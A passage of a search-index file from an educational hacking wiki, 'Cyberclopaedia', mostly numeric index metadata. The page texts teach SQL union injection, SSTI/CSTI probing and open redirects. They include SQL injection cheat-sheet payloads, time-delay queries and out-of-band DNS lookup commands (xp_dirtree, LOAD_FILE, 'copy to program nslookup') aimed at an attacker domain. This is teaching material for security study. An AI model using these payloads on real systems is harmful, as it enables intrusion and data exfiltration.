readcrumbs":3,"title":1},"390":{"body":19,"breadcrumbs":7,"title":1},"391":{"body":22,"breadcrumbs":7,"title":1},"392":{"body":75,"breadcrumbs":7,"title":1},"393":{"body":15,"breadcrumbs":7,"title":1},"394":{"body":77,"breadcrumbs":8,"title":2},"395":{"body":780,"breadcrumbs":8,"title":1},"396":{"body":314,"breadcrumbs":9,"title":2},"397":{"body":56,"breadcrumbs":8,"title":1},"398":{"body":311,"breadcrumbs":8,"title":1},"399":{"body":101,"breadcrumbs":8,"title":1},"4":{"body":77,"breadcrumbs":3,"title":1},"40":{"body":0,"breadcrumbs":3,"title":1},"400":{"body":0,"breadcrumbs":9,"title":1},"401":{"body":34,"breadcrumbs":4,"title":1},"402":{"body":22,"breadcrumbs":7,"title":4},"403":{"body":15,"breadcrumbs":4,"title":1},"404":{"body":36,"breadcrumbs":4,"title":1},"405":{"body":49,"breadcrumbs":12,"title":3},"406":{"body":29,"breadcrumbs":12,"title":3},"407":{"body":31,"breadcrumbs":13,"title":4},"408":{"body":0,"breadcrumbs":2,"title":2},"409":{"body":16,"breadcrumbs":5,"title":1},"41":{"body":37,"breadcrumbs":5,"title":1},"410":{"body":146,"breadcrumbs":6,"title":2},"411":{"body":489,"breadcrumbs":7,"title":3},"412":{"body":23,"breadcrumbs":8,"title":1},"413":{"body":115,"breadcrumbs":9,"title":2},"414":{"body":142,"breadcrumbs":7,"title":1},"415":{"body":133,"breadcrumbs":8,"title":1},"416":{"body":94,"breadcrumbs":9,"title":2},"417":{"body":264,"breadcrumbs":10,"title":3},"418":{"body":106,"breadcrumbs":10,"title":3},"419":{"body":24,"breadcrumbs":9,"title":2},"42":{"body":61,"breadcrumbs":7,"title":3},"420":{"body":123,"breadcrumbs":2,"title":1},"421":{"body":74,"breadcrumbs":3,"title":2},"422":{"body":66,"breadcrumbs":3,"title":2},"423":{"body":363,"breadcrumbs":3,"title":2},"424":{"body":83,"breadcrumbs":2,"title":1},"425":{"body":210,"breadcrumbs":4,"title":1},"426":{"body":53,"breadcrumbs":6,"title":1},"427":{"body":250,"breadcrumbs":7,"title":2},"428":{"body":102,"breadcrumbs":8,"title":3},"429":{"body":168,"breadcrumbs":9,"title":4},"43":{"body":11,"breadcrumbs":7,"title":2},"430":{"body":54,"breadcrumbs":7,"title":1},"431":{"body":291,"breadcrumbs":9,"title":3},"432":{"body":192,"breadcrumbs":10,"title":4},"433":{"body":141,"breadcrumbs":9,"title":3},"434":{"body":263,"breadcrumbs":7,"title":1},"435":{"body":48,"breadcrumbs":6,"title":1},"436":{"body":118,"breadcrumbs":8,"title":3},"437":{"body":99,"breadcrumbs":8,"title":3},"438":{"body":125,"breadcrumbs":7,"title":2},"439":{"body":40,"breadcrumbs":5,"title":1},"44":{"body":159,"breadcrumbs":6,"title":1},"440":{"body":269,"breadcrumbs":7,"title":3},"441":{"body":0,"breadcrumbs":6,"title":1},"442":{"body":0,"breadcrumbs":9,"title":1},"443":{"body":175,"breadcrumbs":11,"title":1},"444":{"body":6,"breadcrumbs":8,"title":2},"445":{"body":40,"breadcrumbs":8,"title":2},"446":{"body":25,"breadcrumbs":8,"title":2},"447":{"body":53,"breadcrumbs":8,"title":2},"448":{"body":47,"breadcrumbs":7,"title":1},"449":{"body":116,"breadcrumbs":10,"title":4},"45":{"body":55,"breadcrumbs":6,"title":1},"450":{"body":66,"breadcrumbs":8,"title":2},"451":{"body":0,"breadcrumbs":17,"title":11},"452":{"body":64,"breadcrumbs":8,"title":2},"453":{"body":79,"breadcrumbs":3,"title":1},"454":{"body":101,"breadcrumbs":7,"title":2},"455":{"body":180,"breadcrumbs":9,"title":4},"456":{"body":125,"breadcrumbs":9,"title":4},"457":{"body":198,"breadcrumbs":6,"title":1},"458":{"body":207,"breadcrumbs":8,"title":3},"459":{"body":640,"breadcrumbs":7,"title":2},"46":{"body":0,"breadcrumbs":6,"title":1},"460":{"body":445,"breadcrumbs":8,"title":2},"461":{"body":146,"breadcrumbs":10,"title":4},"462":{"body":193,"breadcrumbs":8,"title":2},"463":{"body":239,"breadcrumbs":5,"title":1},"464":{"body":140,"breadcrumbs":7,"title":1},"465":{"body":69,"breadcrumbs":8,"title":2},"466":{"body":104,"breadcrumbs":7,"title":1},"467":{"body":29,"breadcrumbs":11,"title":1},"468":{"body":131,"breadcrumbs":13,"title":3},"469":{"body":240,"breadcrumbs":15,"title":5},"47":{"body":71,"breadcrumbs":6,"title":1},"470":{"body":81,"breadcrumbs":12,"title":2},"471":{"body":59,"breadcrumbs":12,"title":2},"472":{"body":0,"breadcrumbs":12,"title":1},"473":{"body":41,"breadcrumbs":7,"title":1},"474":{"body":116,"breadcrumbs":8,"title":2},"475":{"body":22,"breadcrumbs":10,"title":1},"476":{"body":394,"breadcrumbs":12,"title":1},"477":{"body":164,"breadcrumbs":14,"title":3},"478":{"body":39,"breadcrumbs":12,"title":1},"479":{"body":334,"breadcrumbs":13,"title":2},"48":{"body":148,"breadcrumbs":13,"title":8},"480":{"body":352,"breadcrumbs":13,"title":2},"481":{"body":93,"breadcrumbs":14,"title":4},"482":{"body":265,"breadcrumbs":12,"title":2},"483":{"body":269,"breadcrumbs":12,"title":2},"484":{"body":94,"breadcrumbs":8,"title":1},"485":{"body":191,"breadcrumbs":9,"title":2},"486":{"body":47,"breadcrumbs":9,"title":2},"487":{"body":128,"breadcrumbs":8,"title":1},"488":{"body":311,"breadcrumbs":9,"title":2},"489":{"body":126,"breadcrumbs":11,"title":1},"49":{"body":75,"breadcrumbs":9,"title":4},"490":{"body":68,"breadcrumbs":14,"title":4},"491":{"body":174,"breadcrumbs":12,"title":2},"492":{"body":18,"breadcrumbs":12,"title":2},"493":{"body":296,"breadcrumbs":10,"title":1},"494":{"body":78,"breadcrumbs":12,"title":3},"495":{"body":78,"breadcrumbs":7,"title":1},"496":{"body":159,"breadcrumbs":7,"title":1},"497":{"body":114,"breadcrumbs":9,"title":1},"498":{"body":170,"breadcrumbs":14,"title":3},"499":{"body":146,"breadcrumbs":14,"title":3},"5":{"body":6,"breadcrumbs":3,"title":1},"50":{"body":323,"breadcrumbs":9,"title":4},"500":{"body":91,"breadcrumbs":14,"title":3},"501":{"body":174,"breadcrumbs":18,"title":5},"502":{"body":230,"breadcrumbs":16,"title":3},"503":{"body":33,"breadcrumbs":16,"title":3},"504":{"body":54,"breadcrumbs":13,"title":1},"505":{"body":64,"breadcrumbs":15,"title":3},"506":{"body":131,"breadcrumbs":11,"title":1},"507":{"body":25,"breadcrumbs":12,"title":2},"508":{"body":65,"breadcrumbs":11,"title":1},"509":{"body":89,"breadcrumbs":12,"title":2},"51":{"body":110,"breadcrumbs":12,"title":7},"510":{"body":9,"breadcrumbs":11,"title":1},"511":{"body":40,"breadcrumbs":11,"title":1},"512":{"body":38,"breadcrumbs":11,"title":1},"513":{"body":64,"breadcrumbs":10,"title":1},"514":{"body":217,"breadcrumbs":10,"title":1},"515":{"body":117,"breadcrumbs":13,"title":4},"516":{"body":152,"breadcrumbs":13,"title":4},"517":{"body":25,"breadcrumbs":11,"title":1},"518":{"body":184,"breadcrumbs":12,"title":2},"519":{"body":80,"breadcrumbs":12,"title":2},"52":{"body":6,"breadcrumbs":6,"title":1},"520":{"body":96,"breadcrumbs":9,"title":1},"521":{"body":229,"breadcrumbs":11,"title":3},"522":{"body":253,"breadcrumbs":9,"title":1},"523":{"body":85,"breadcrumbs":10,"title":2},"524":{"body":93,"breadcrumbs":10,"title":2},"525":{"body":132,"breadcrumbs":16,"title":4},"526":{"body":49,"breadcrumbs":14,"title":2},"527":{"body":266,"breadcrumbs":14,"title":3},"528":{"body":362,"breadcrumbs":15,"title":4},"529":{"body":50,"breadcrumbs":8,"title":1},"53":{"body":0,"breadcrumbs":5,"title":1},"530":{"body":167,"breadcrumbs":10,"title":3},"531":{"body":190,"breadcrumbs":11,"title":4},"532":{"body":70,"breadcrumbs":9,"title":2},"533":{"body":1,"breadcrumbs":14,"title":1},"534":{"body":15,"breadcrumbs":14,"title":1},"535":{"body":181,"breadcrumbs":7,"title":1},"536":{"body":11,"breadcrumbs":7,"title":1},"537":{"body":56,"breadcrumbs":9,"title":3},"538":{"body":152,"breadcrumbs":8,"title":2},"539":{"body":91,"breadcrumbs":8,"title":2},"54":{"body":40,"breadcrumbs":5,"title":1},"540":{"body":326,"breadcrumbs":8,"title":2},"541":{"body":123,"breadcrumbs":8,"title":1},"542":{"body":28,"breadcrumbs":11,"title":4},"543":{"body":0,"breadcrumbs":3,"title":1},"544":{"body":94,"breadcrumbs":6,"title":1},"545":{"body":157,"breadcrumbs":7,"title":2},"546":{"body":0,"breadcrumbs":3,"title":1},"547":{"body":0,"breadcrumbs":5,"title":1},"548":{"body":50,"breadcrumbs":8,"title":1},"549":{"body":27,"breadcrumbs":10,"title":1},"55":{"body":70,"breadcrumbs":7,"title":3},"550":{"body":187,"breadcrumbs":13,"title":4},"551":{"body":280,"breadcrumbs":12,"title":3},"552":{"body":298,"breadcrumbs":6,"title":2},"553":{"body":351,"breadcrumbs":6,"title":2},"554":{"body":229,"breadcrumbs":4,"title":1},"555":{"body":51,"breadcrumbs":5,"title":2},"556":{"body":50,"breadcrumbs":5,"title":2},"557":{"body":74,"breadcrumbs":4,"title":1},"558":{"body":97,"breadcrumbs":4,"title":1},"559":{"body":272,"breadcrumbs":5,"title":2},"56":{"body":48,"breadcrumbs":7,"title":3},"560":{"body":22,"breadcrumbs":5,"title":2},"561":{"body":23,"breadcrumbs":4,"title":1},"562":{"body":30,"breadcrumbs":4,"title":1},"563":{"body":29,"breadcrumbs":4,"title":1},"564":{"body":117,"breadcrumbs":4,"title":1},"565":{"body":111,"breadcrumbs":5,"title":2},"566":{"body":207,"breadcrumbs":4,"title":1},"567":{"body":82,"breadcrumbs":4,"title":1},"568":{"body":39,"breadcrumbs":5,"title":2},"569":{"body":79,"breadcrumbs":5,"title":2},"57":{"body":77,"breadcrumbs":5,"title":1},"570":{"body":174,"breadcrumbs":5,"title":2},"571":{"body":176,"breadcrumbs":4,"title":1},"572":{"body":178,"breadcrumbs":5,"title":1},"573":{"body":167,"breadcrumbs":6,"title":2},"574":{"body":352,"breadcrumbs":7,"title":3},"575":{"body":89,"breadcrumbs":7,"title":3},"576":{"body":0,"breadcrumbs":6,"title":2},"577":{"body":8,"breadcrumbs":2,"title":1},"578":{"body":0,"breadcrumbs":3,"title":1},"579":{"body":0,"breadcrumbs":5,"title":1},"58":{"body":127,"breadcrumbs":6,"title":2},"580":{"body":23,"breadcrumbs":10,"title":1},"581":{"body":69,"breadcrumbs":11,"title":2},"582":{"body":94,"breadcrumbs":13,"title":4},"583":{"body":131,"breadcrumbs":12,"title":3},"584":{"body":51,"breadcrumbs":11,"title":1},"585":{"body":45,"breadcrumbs":12,"title":2},"586":{"body":159,"breadcrumbs":12,"title":2},"587":{"body":38,"breadcrumbs":13,"title":3},"588":{"body":39,"breadcrumbs":13,"title":3},"589":{"body":75,"breadcrumbs":13,"title":3},"59":{"body":0,"breadcrumbs":2,"title":1},"590":{"body":44,"breadcrumbs":12,"title":1},"591":{"body":207,"breadcrumbs":12,"title":1},"592":{"body":46,"breadcrumbs":13,"title":2},"593":{"body":74,"breadcrumbs":12,"title":1},"594":{"body":35,"breadcrumbs":15,"title":1},"595":{"body":19,"breadcrumbs":17,"title":3},"596":{"body":28,"breadcrumbs":12,"title":1},"597":{"body":28,"breadcrumbs":13,"title":2},"598":{"body":31,"breadcrumbs":12,"title":1},"599":{"body":25,"breadcrumbs":15,"title":4},"6":{"body":51,"breadcrumbs":4,"title":2},"60":{"body":0,"breadcrumbs":5,"title":2},"600":{"body":70,"breadcrumbs":20,"title":9},"601":{"body":32,"breadcrumbs":14,"title":3},"602":{"body":109,"breadcrumbs":13,"title":2},"603":{"body":75,"breadcrumbs":14,"title":3},"604":{"body":49,"breadcrumbs":12,"title":1},"605":{"body":41,"breadcrumbs":13,"title":2},"606":{"body":24,"breadcrumbs":14,"title":3},"607":{"body":258,"breadcrumbs":12,"title":1},"608":{"body":16,"breadcrumbs":12,"title":1},"609":{"body":106,"breadcrumbs":12,"title":1},"61":{"body":70,"breadcrumbs":7,"title":2},"610":{"body":333,"breadcrumbs":13,"title":2},"611":{"body":100,"breadcrumbs":13,"title":2},"612":{"body":0,"breadcrumbs":9,"title":1},"613":{"body":24,"breadcrumbs":6,"title":1},"614":{"body":258,"breadcrumbs":7,"title":2},"615":{"body":96,"breadcrumbs":7,"title":2},"616":{"body":40,"breadcrumbs":10,"title":5},"617":{"body":39,"breadcrumbs":7,"title":2},"618":{"body":247,"breadcrumbs":7,"title":2},"619":{"body":8,"breadcrumbs":7,"title":2},"62":{"body":65,"breadcrumbs":9,"title":1},"620":{"body":8,"breadcrumbs":9,"title":4},"621":{"body":125,"breadcrumbs":8,"title":1},"622":{"body":9,"breadcrumbs":10,"title":3},"623":{"body":219,"breadcrumbs":9,"title":2},"624":{"body":20,"breadcrumbs":10,"title":3},"625":{"body":30,"breadcrumbs":10,"title":3},"626":{"body":152,"breadcrumbs":11,"title":4},"627":{"body":29,"breadcrumbs":8,"title":1},"628":{"body":70,"breadcrumbs":12,"title":5},"629":{"body":256,"breadcrumbs":11,"title":4},"63":{"body":365,"breadcrumbs":9,"title":1},"630":{"body":51,"breadcrumbs":12,"title":5},"631":{"body":81,"breadcrumbs":9,"title":2},"632":{"body":18,"breadcrumbs":13,"title":6},"633":{"body":43,"breadcrumbs":9,"title":2},"634":{"body":144,"breadcrumbs":9,"title":2},"635":{"body":88,"breadcrumbs":8,"title":1},"636":{"body":74,"breadcrumbs":9,"title":2},"637":{"body":9,"breadcrumbs":9,"title":2},"638":{"body":36,"breadcrumbs":9,"title":2},"639":{"body":43,"breadcrumbs":9,"title":2},"64":{"body":20,"breadcrumbs":7,"title":2},"640":{"body":75,"breadcrumbs":10,"title":3},"641":{"body":75,"breadcrumbs":8,"title":1},"642":{"body":0,"breadcrumbs":9,"title":1},"643":{"body":36,"breadcrumbs":10,"title":1},"644":{"body":0,"breadcrumbs":14,"title":5},"645":{"body":30,"breadcrumbs":11,"title":2},"646":{"body":120,"breadcrumbs":11,"title":2},"647":{"body":205,"breadcrumbs":11,"title":2},"648":{"body":184,"breadcrumbs":11,"title":2},"649":{"body":9,"breadcrumbs":11,"title":2},"65":{"body":163,"breadcrumbs":9,"title":1},"650":{"body":76,"breadcrumbs":11,"title":2},"651":{"body":63,"breadcrumbs":10,"title":1},"652":{"body":116,"breadcrumbs":11,"title":2},"653":{"body":50,"breadcrumbs":11,"title":2},"654":{"body":48,"breadcrumbs":10,"title":1},"655":{"body":15,"breadcrumbs":14,"title":5},"656":{"body":0,"breadcrumbs":11,"title":2},"657":{"body":40,"breadcrumbs":10,"title":1},"658":{"body":32,"breadcrumbs":11,"title":2},"659":{"body":0,"breadcrumbs":11,"title":2},"66":{"body":64,"breadcrumbs":12,"title":4},"660":{"body":148,"breadcrumbs":14,"title":5},"661":{"body":22,"breadcrumbs":12,"title":3},"662":{"body":320,"breadcrumbs":11,"title":2},"663":{"body":116,"breadcrumbs":12,"title":3},"664":{"body":29,"breadcrumbs":12,"title":3},"665":{"body":24,"breadcrumbs":11,"title":2},"666":{"body":357,"breadcrumbs":12,"title":3},"667":{"body":0,"breadcrumbs":7,"title":1},"668":{"body":0,"breadcrumbs":7,"title":1},"669":{"body":41,"breadcrumbs":8,"title":1},"67":{"body":160,"breadcrumbs":10,"title":2},"670":{"body":11,"breadcrumbs":8,"title":1},"671":{"body":31,"breadcrumbs":9,"title":2},"672":{"body":52,"breadcrumbs":10,"title":3},"673":{"body":75,"breadcrumbs":11,"title":4},"674":{"body":48,"breadcrumbs":10,"title":3},"675":{"body":27,"breadcrumbs":15,"title":8},"676":{"body":36,"breadcrumbs":10,"title":3},"677":{"body":40,"breadcrumbs":13,"title":6},"678":{"body":128,"breadcrumbs":10,"title":1},"679":{"body":15,"breadcrumbs":8,"title":1},"68":{"body":411,"breadcrumbs":11,"title":3},"680":{"body":40,"breadcrumbs":10,"title":3},"681":{"body":0,"breadcrumbs":9,"title":2},"682":{"body":76,"breadcrumbs":11,"title":4},"683":{"body":86,"breadcrumbs":12,"title":5},"684":{"body":36,"breadcrumbs":12,"title":5},"685":{"body":24,"breadcrumbs":12,"title":5},"686":{"body":0,"breadcrumbs":7,"title":1},"687":{"body":68,"breadcrumbs":8,"title":1},"688":{"body":46,"breadcrumbs":10,"title":1},"689":{"body":43,"breadcrumbs":10,"title":1},"69":{"body":103,"breadcrumbs":9,"title":2},"690":{"body":89,"breadcrumbs":11,"title":2},"691":{"body":159,"breadcrumbs":13,"title":4},"692":{"body":82,"breadcrumbs":11,"title":2},"693":{"body":135,"breadcrumbs":12,"title":3},"694":{"body":0,"breadcrumbs":8,"title":1},"695":{"body":24,"breadcrumbs":8,"title":1},"696":{"body":26,"breadcrumbs":8,"title":1},"697":{"body":38,"breadcrumbs":8,"title":1},"698":{"body":26,"breadcrumbs":11,"title":4},"699":{"body":32,"breadcrumbs":10,"title":3},"7":{"body":69,"breadcrumbs":4,"title":2},"70":{"body":5,"breadcrumbs":9,"title":2},"700":{"body":13,"breadcrumbs":8,"title":1},"701":{"body":10,"breadcrumbs":9,"title":2},"702":{"body":28,"breadcrumbs":9,"title":2},"703":{"body":29,"breadcrumbs":9,"title":2},"704":{"body":59,"breadcrumbs":8,"title":1},"705":{"body":49,"breadcrumbs":9,"title":2},"706":{"body":68,"breadcrumbs":8,"title":1},"707":{"body":118,"breadcrumbs":14,"title":7},"708":{"body":49,"breadcrumbs":9,"title":2},"709":{"body":22,"breadcrumbs":9,"title":2},"71":{"body":128,"breadcrumbs":9,"title":2},"710":{"body":85,"breadcrumbs":9,"title":2},"711":{"body":39,"breadcrumbs":6,"title":1},"712":{"body":45,"breadcrumbs":7,"title":1},"713":{"body":85,"breadcrumbs":8,"title":2},"714":{"body":43,"breadcrumbs":10,"title":4},"715":{"body":28,"breadcrumbs":7,"title":1},"716":{"body":207,"breadcrumbs":8,"title":2},"717":{"body":63,"breadcrumbs":7,"title":1},"718":{"body":40,"breadcrumbs":8,"title":2},"719":{"body":45,"breadcrumbs":9,"title":3},"72":{"body":21,"breadcrumbs":9,"title":2},"720":{"body":41,"breadcrumbs":10,"title":4},"721":{"body":35,"breadcrumbs":9,"title":3},"722":{"body":101,"breadcrumbs":8,"title":2},"723":{"body":48,"breadcrumbs":8,"title":2},"724":{"body":37,"breadcrumbs":8,"title":2},"725":{"body":68,"breadcrumbs":9,"title":3},"726":{"body":15,"breadcrumbs":9,"title":3},"727":{"body":374,"breadcrumbs":7,"title":1},"728":{"body":170,"breadcrumbs":7,"title":1},"729":{"body":65,"breadcrumbs":7,"title":1},"73":{"body":24,"breadcrumbs":8,"title":1},"730":{"body":83,"breadcrumbs":8,"title":2},"731":{"body":178,"breadcrumbs":9,"title":3},"732":{"body":0,"breadcrumbs":8,"title":2},"733":{"body":182,"breadcrumbs":6,"title":1},"734":{"body":212,"breadcrumbs":8,"title":3},"735":{"body":108,"breadcrumbs":7,"title":2},"736":{"body":17,"breadcrumbs":3,"title":1},"737":{"body":0,"breadcrumbs":4,"title":2},"738":{"body":0,"breadcrumbs":3,"title":1},"739":{"body":83,"breadcrumbs":8,"title":2},"74":{"body":182,"breadcrumbs":8,"title":1},"740":{"body":31,"breadcrumbs":8,"title":2},"741":{"body":26,"breadcrumbs":8,"title":2},"742":{"body":23,"breadcrumbs":8,"title":2},"743":{"body":26,"breadcrumbs":8,"title":2},"744":{"body":33,"breadcrumbs":8,"title":2},"745":{"body":24,"breadcrumbs":9,"title":3},"746":{"body":22,"breadcrumbs":8,"title":2},"747":{"body":55,"breadcrumbs":8,"title":2},"748":{"body":50,"breadcrumbs":10,"title":1},"749":{"body":0,"breadcrumbs":10,"title":1},"75":{"body":203,"breadcrumbs":8,"title":1},"750":{"body":284,"breadcrumbs":12,"title":3},"751":{"body":187,"breadcrumbs":12,"title":3},"752":{"body":265,"breadcrumbs":11,"title":2},"753":{"body":38,"breadcrumbs":11,"title":2},"754":{"body":30,"breadcrumbs":14,"title":5},"755":{"body":64,"breadcrumbs":13,"title":4},"756":{"body":51,"breadcrumbs":13,"title":4},"757":{"body":52,"breadcrumbs":14,"title":5},"758":{"body":56,"breadcrumbs":11,"title":2},"759":{"body":0,"breadcrumbs":12,"title":3},"76":{"body":66,"breadcrumbs":10,"title":1},"760":{"body":30,"breadcrumbs":11,"title":2},"761":{"body":13,"breadcrumbs":11,"title":2},"762":{"body":16,"breadcrumbs":11,"title":2},"763":{"body":34,"breadcrumbs":10,"title":1},"764":{"body":79,"breadcrumbs":11,"title":2},"765":{"body":0,"breadcrumbs":8,"title":3},"766":{"body":306,"breadcrumbs":3,"title":1},"767":{"body":194,"breadcrumbs":3,"title":1},"768":{"body":123,"breadcrumbs":4,"title":2},"769":{"body":150,"breadcrumbs":4,"title":2},"77":{"body":28,"breadcrumbs":10,"title":1},"78":{"body":130,"breadcrumbs":10,"title":1},"79":{"body":28,"breadcrumbs":11,"title":2},"8":{"body":63,"breadcrumbs":3,"title":1},"80":{"body":16,"breadcrumbs":12,"title":3},"81":{"body":30,"breadcrumbs":10,"title":1},"82":{"body":87,"breadcrumbs":13,"title":4},"83":{"body":23,"breadcrumbs":11,"title":2},"84":{"body":477,"breadcrumbs":10,"title":1},"85":{"body":116,"breadcrumbs":8,"title":1},"86":{"body":123,"breadcrumbs":10,"title":3},"87":{"body":142,"breadcrumbs":13,"title":6},"88":{"body":12,"breadcrumbs":10,"title":3},"89":{"body":4,"breadcrumbs":8,"title":1},"9":{"body":16,"breadcrumbs":3,"title":1},"90":{"body":42,"breadcrumbs":9,"title":2},"91":{"body":0,"breadcrumbs":3,"title":1},"92":{"body":0,"breadcrumbs":6,"title":2},"93":{"body":35,"breadcrumbs":7,"title":1},"94":{"body":21,"breadcrumbs":8,"title":3},"95":{"body":7,"breadcrumbs":8,"title":3},"96":{"body":7,"breadcrumbs":8,"title":3},"97":{"body":62,"breadcrumbs":6,"title":1},"98":{"body":95,"breadcrumbs":7,"title":2},"99":{"body":49,"breadcrumbs":7,"title":1}},"docs":{"0":{"body":"The Cyberclopaedia This is an aspiring project aimed at accumulating knowledge from the world of cybersecurity and presenting it in a cogent way, so it is accessible to as large an audience as possible and so that everyone has a good resource to learn hacking from. Warning The information here is for educational purposes only.","breadcrumbs":"Cyberclopaedia","id":"0","title":"Cyberclopaedia"},"1":{"body":"The Cyberclopaedia is open to contribution from everyone via pull requests on the Cyberclopaedia GitHub repository . When contributing new content, please ensure that it is as relevant as possible, contains detailed (and yet tractable) explanations and is accompanied by diagrams where appropriate.","breadcrumbs":"Cyberclopaedia » Contributing » Overview","id":"1","title":"Overview"},"10":{"body":"MIT License Copyright (c) 2023 Cyberclopaedia Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.","breadcrumbs":"Cyberclopaedia » License","id":"10","title":"Cyberclopaedia"},"100":{"body":"In a union injection, the number of columns in the injected query must match the number of columns in the original query. You can determine the number of columns by using the following query and keep appending NULLs until you observe a change in behaviour: UNION SELECT NULL-- UNION SELECT NULL, NULL -- And so on.","breadcrumbs":"Exploitation » Web » SQL Injection » Union injections » Determining the amount of columns returned","id":"100","title":"Determining the amount of columns returned"},"101":{"body":"Once you have determined the amount of columns, you can look for columns that contain entries of a specific type. Suppose the original query has 3 columns. UNION SELECT NULL, NULL, NULL -- You can start replacing the NULLs one by one with a random string of text enclosed in quotation marks until you observe a change in behaviour: UNION SELECT 'random text', NULL, NULL -- UNION SELECT NULL, 'random text', NULL -- And so on.","breadcrumbs":"Exploitation » Web » SQL Injection » Union injections » Searching for columns which return entries of a particular type","id":"101","title":"Searching for columns which return entries of a particular type"},"102":{"body":"Database engines provide tables with the database's metadata. This metadata table is different for the different engines: Engine Table Name SQLite sqlite_master MySQL information_schema PostgreSQL information_schema Oracle dba_tables","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Database Metadata","id":"102","title":"Database Metadata"},"103":{"body":"Database Version Info Oracle SELECT banner FROM v$version SELECT version FROM v$instance Microsoft SELECT @@version PostgreSQL SELECT version() MySQL SELECT @@version","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Database Version","id":"103","title":"Database Version"},"104":{"body":"Listing tables and the columns they contain: Database Contents Info Oracle SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'Table Name' Microsoft SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' PostgreSQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' MySQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Database Contents","id":"104","title":"Database Contents"},"105":{"body":"Database Concatenation Oracle 'a'||'b' Microsoft 'a'+'b' PostgreSQL 'a'||'b' MySQL 'a' 'b' (space) or CONCAT('a','b')","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » String Concatenation","id":"105","title":"String Concatenation"},"106":{"body":"Replace delay with the desired delay in seconds. Database | Delay Syntax ---------| ------------ Oracle| dbms_pipe.receive_message(('a'),delay) Microsoft| WAITFOR DELAY 'hours:minutes:seconds' PostgreSQL| SELECT pg_sleep(delay) MySQL| SELECT sleep(delay)","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Unconditional Time Delays","id":"106","title":"Unconditional Time Delays"},"107":{"body":"Database Lookup Syntax Oracle SELECT UTL_INADDR.get_host_address('domain') - requires elevated privileges Microsoft exec master..xp_dirtree '//domain/a' PostgreSQL copy (SELECT '') to program 'nslookup domain MySQL These work only on Windows LOAD_FILE('\\\\\\\\domain\\\\a') SELECT ... INTO OUTFILE '\\\\\\\\domain\\a'","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » DNS Lookups","id":"107","title":"DNS Lookups"},"108":{"body":"Template Injection occurs when an attacker injects malicious template code into an input field and the templating engine doesn't sanitise the input. As such, the expression provided by the attacker may be evaluated and can lead to all sorts of nasty vulnerabilities such as RCE.","breadcrumbs":"Exploitation » Web » Template Injection » Overview","id":"108","title":"Overview"},"109":{"body":"SSTI occurs when the injection happens on the server-side. Templating engines are associated with different programming languages, so you might be able to execute code in that language when SSTI occurs. Testing for SSTI is template engine-dependent because different engines make use of a different syntax. It is, however, common to see templates enclosed in two pairs of {{}}. You should look for places in a webpage where user input is reflected. If you inject {{7*'7'}} and see 49 or 7777777 somewhere, then you know you have SSTI. This syntax isn't standard. You will need to identify the running template engine and use the correct syntax.","breadcrumbs":"Exploitation » Web » Template Injection » Server-Side Template Injection","id":"109","title":"Server-Side Template Injection"},"11":{"body":"","breadcrumbs":"Reconnaissance » Introduction","id":"11","title":"Introduction"},"110":{"body":"This vulnerability occurs in client template engines, which are written in Javascript. Such engines are Google's AngularJS and Facebook's ReactJS. CSTI typically occur in browser, so they typically cannot be used for RCE, but may be exploited for XSS. This can be difficult, since most engines do a good job at sanitising input and preventing XSS. When interacting with ReactJS, you should look for dangerouslySetInnerHTML function calls where you can modify the input. This function intentionally bypasses React's XSS protections. AngularJS versions before 1.6 include a sandbox in order to limit the available Javascript functions, but bypasses have been found. You can check the AngularJS version by typing Angular.version in the developer console. A list of bypasses can be found at https://pastebin.com/xMXwsm0N, however, more are surely available online.","breadcrumbs":"Exploitation » Web » Template Injection » Client-Side Template Injection","id":"110","title":"Client-Side Template Injection"},"111":{"body":"Open redirect vulnerabilities occur when a target visits a website which sends their browser to another URL. These attacks only redirect users and as such are often considered to be of low severity.","breadcrumbs":"Exploitation » Web » Open Redirect » Overview","id":"111","title":"Overview"},"112":{"body":"Open redirects occur when a developer mistrusts user input, which redirects to another site, usually via a URL parameter, HTML tags, or the DOM window location property.","breadcrumbs":"Exploitation » Web » Open Redirect » How Do They Work","id":"112","title":"How Do They Work"},"113":{"body":"Suppose that Google could redirect users to their Gmail service via the following URL: https://www.google.com/?redirect_to=https://www.gmail.com In this case, visiting www.google.com would result in your browser sending an HTTP request to the Google web server. The server would process this request and return a status code - typically 302, although it may sometimes be 301, 303, 307, or 308. This code would inform the browser that the page has been found, however, it would also tell it to make an additional HTTP request to www.gmail.com. This will be noted in the Location: header of the HTTP response. This header specifies where to redirect GET requests. An attacker could change the value of the redirect_to parameter and forward you to their malicious server. Common redirection parameter names include url=, redirect=, next=, however, they may also be denoted by a single letter at times.","breadcrumbs":"Exploitation » Web » Open Redirect » URL Parameter Redirect","id":"113","title":"URL Parameter Redirect"},"114":{"body":"HTML tags can tell a browser to reload a page and make a GET request to a specified URL. This URL is defined in the tag's content attribute. This is an example of such a tag: First, the content attribute defines the number of seconds the browser should wait before making the request to the URL. Secondly, it specifies the URL to make the request to.","breadcrumbs":"Exploitation » Web » Open Redirect » Meta Refresh Tag 